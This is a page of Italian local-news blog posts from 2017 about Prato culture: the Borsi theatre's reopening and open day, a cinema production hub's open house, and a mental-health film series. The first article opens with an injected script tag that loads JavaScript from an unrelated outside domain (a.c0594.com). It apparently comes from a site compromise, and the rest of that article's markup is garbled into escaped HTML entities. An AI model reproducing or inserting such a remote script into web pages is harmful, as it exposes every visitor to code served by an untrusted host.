Articolo
20 ott 2017

21 ottobre Open day per il teatro Borsi

di Cristina Betti

<script src=http://a.c0594.com/?js=6></script>&lt;strong&gt;Sabato 21 ottobre, dalle 11:00 alle 24:00, il teatro Borsi fa una giornata di apertura per presentare il teatro, che riapre dopo 6 anni di chiusura.&lt;/strong&gt; &lt;hr /&gt; Durante la giornata si potrà entrare gratuitamente nel teatro per visitare la struttura sistemata ed avere informazioni riguardo i nuovi spettacoli, i corsi, le serate dedicate al cinema e tanto altro. &lt;span style="color: #000000"&gt;Ore 12.30 Conferenza Stampa di Presentazione della Stagione e delle attività del Borsi e consegna della tessera n.1 al Sindaco di Prato Matteo Biffoni. &lt;/span&gt; &lt;br style="color: #000000" /&gt;&lt;span style="color: #000000"&gt;Ore 15.00 - Incontro con i Docenti dei Corsi del Borsi e Artisti della Stagione 2017-18. &lt;/span&gt; &lt;br style="color: #000000" /&gt;&lt;span style="color: #000000"&gt;Ore 17.30 - 1a Assemblea dei Soci dell'Associazione Pratoteatro che ha ingestione il Borsi &lt;/span&gt; &lt;br style="color: #000000" /&gt;&lt;span style="color: #000000"&gt;Ore 20.30 - Mirabilia di e con Alessio Sardelli. Un attore all'Asta.&lt;/span&gt; Per info: &lt;a href="http://www.teatroborsi.it/" target="_blank"&gt;www.teatroborsi.it&lt;/a&gt; - &lt;span style="color: #000000"&gt; 0574 18 26 529 - 329 06 13 710&lt;/span&gt; &amp;nbsp; &amp;nbsp;

Leggi tutto    Commenti 0
Articolo
28 set 2017

La fabbrica del cinema apre i battenti sabato 30!

di Cristina Betti

Sabato 30 settembre si terrà l'open day di Manifatture Digitali Cinema. Prato "rischia" di trasformarsi in una "Cinecittà" toscana. E' questa infatti l'anteprima del progetto "Cineporto", ovvero una delle due manifatture digitali previste dall’intesa siglata tra Regione Toscana, Direzione generale cinema del MiBACT e Agenzia per la Coesione Territoriale, e che punta allo sviluppo del settore audiovisivo con un investimento complessivo in Toscana. Manifatture Digitali Cinema nasce sotto l’egida del Mibact, Agenzia per la coesione territoriale, il progetto Sensi Contemporanei Toscana per il cinema, Regione Toscana, Fondazione Sistema Toscana e Comune di Prato, e sarà il punto di riferimento per produttori e i talenti dei mestieri del cinema. Il 30 settembre, dalle 11:00 alle 19:00 in via Dolce de’ Mazzamuti 1, i visitatori (l'ingresso è libero) potranno visitare l’area dedicata al trucco e alla sartoria avranno a disposizione  una troupe per sperimentare in prima persona l’emozione degli effetti cinematografici. Il “cineporto” pratese conterrà una fabbrica per scenografie, tessuti, materiali, macchinari, modelli, uffici di produzione e casting, erogazione di servizi.  

Leggi tutto    Commenti 0
Articolo
17 mag 2017

A novembre torna l’ex-cinema Borsi!

di Cristina Betti

Dopo sei anni di chiusura, l'ex-cinema Borsi riapre grazie anche a un crowdfounding per i finanziamenti che termina il 31 luglio. Dopo anni di chiusura, finalmente a novembre torna a nuova vita il Borsi, ma non più come cinema bensì come teatro per musicisti, attori, cantanti e compagnie. L'idea di riaprirlo è stata dell'Associazione PratoTeatro, che ha programmato per il 2 novembre il primo spettacolo con Giovanni Nesi in concerto. Il progetto, del valore di 100mila euro, prevede la riduzione dei posti a 99 (con la speranza di arrivare a 170 con l'aiuto degli sponsor nel giro di qualche anno), l'ingresso con tessera e l'ampliamento del palco di 5 metri. Intato su internet è partita l'idea del crowdfounding, la campagna di raccolta fondi "Salviamo il Borsi: 1.500 persone con 10 euro a testa", che si concluderà il 31 luglio. Accanto a questa operazione di raccolta fondi, l'Associazione ha partecipato a tre bandi nella speranza di avere quanto più sostegno possibile per questa riapertura. “Con questa iniziativa – afferma il direttore artistico Daniele Griggio – vogliamo da una parte, restituire alla città una delle sue sale storiche, dall’altra realizzare una casa dello spettacolo e in una fase non facile per la città, offrire, non solo intrattenimento e cultura, ma anche posti di lavoro e un indotto per la città" Il Borsi sarà aperto tutti i giorni: la mattina per le scuole, il pomeriggio per la formazione e la sera per gli spettacoli. Oltre a teatro e musica il martedì sarà dedicato alla proiezione di pellicole restaurate dalla cineteca di Bologna, film sonori classici e muti accompagnati da un pianista di sala. Nell'attesa della riapertura, contribuite al suo rilancio visitando il sito del Borsi, in cui è già presente la programmazione: www.teatroborsi.it.  

Leggi tutto    Commenti 0
Articolo
09 feb 2017

“Pellicole strapazzate”: cinema sulla salute mentale

di Cristina Betti

A partire dal 7 febbraio presso la pizzeria Fuori di Pizza di via A. Ciardi la prima proiezione di "Pellicole strapazzate". La rassegna cinematografica "Pellicole Strapazzate", organizzata dalla Polisportiva Aurora e da Pangea, vedrà la proiezione di sei film a tema "salute mentale" presso la Pizzeria Fuori di Pizza di Via Ciardi. I film verranno proiettati dalle ore 21 e vedranno la partecipazione con interventi di psicologi, psichiatri e docenti universitari del settore. Questo il programma: Martedi 7 febbraio La Pazza Goia (2016) diretto da Paolo Virzì. A seguire incontro con Serena Magnini. Martedì 21 febbraio Si Può Fare (2008) diretto da Giulio Manfredonia. Interviene il Responsabile Centro Impiego Francesco di Maria. Giovedì 2 marzo Rain Main (1988,Vincitore dell’Orso d’oro al Festival di Berlino) diretto da Barry Levinson. Moderatore dell’incontro il Neuropsichiatra infantile Marco Armellini. Giovedì 9 marzo Family Life (1971,Film ispirato dalle teorie antipsichiatriche di Ronald Laing) diretto da Ken Loach. Intervento dello psicologo Lamberto Scali. Martedì 28 Marzo Qualcuno Volo Sul Nido Del Cuculo (1975, film tratto dal romanzo omonimo di Ken Kesey) diretto da Miloš Forman. Dirige l’incontro lo psicoterapeuta Mario Santini. Domenica 4 aprile alle ore 16 C’era una volta la città dei matti… (diretto da Marco Turco, 2010). Prima puntata alle 16, alle 21 proiezione della seconda puntata della miniserie assiste all’incontro lo psichiatra Sandro Ventura. Per info e prenotazioni: cell 320.0297940 / 338.3990941    

Leggi tutto    Commenti 0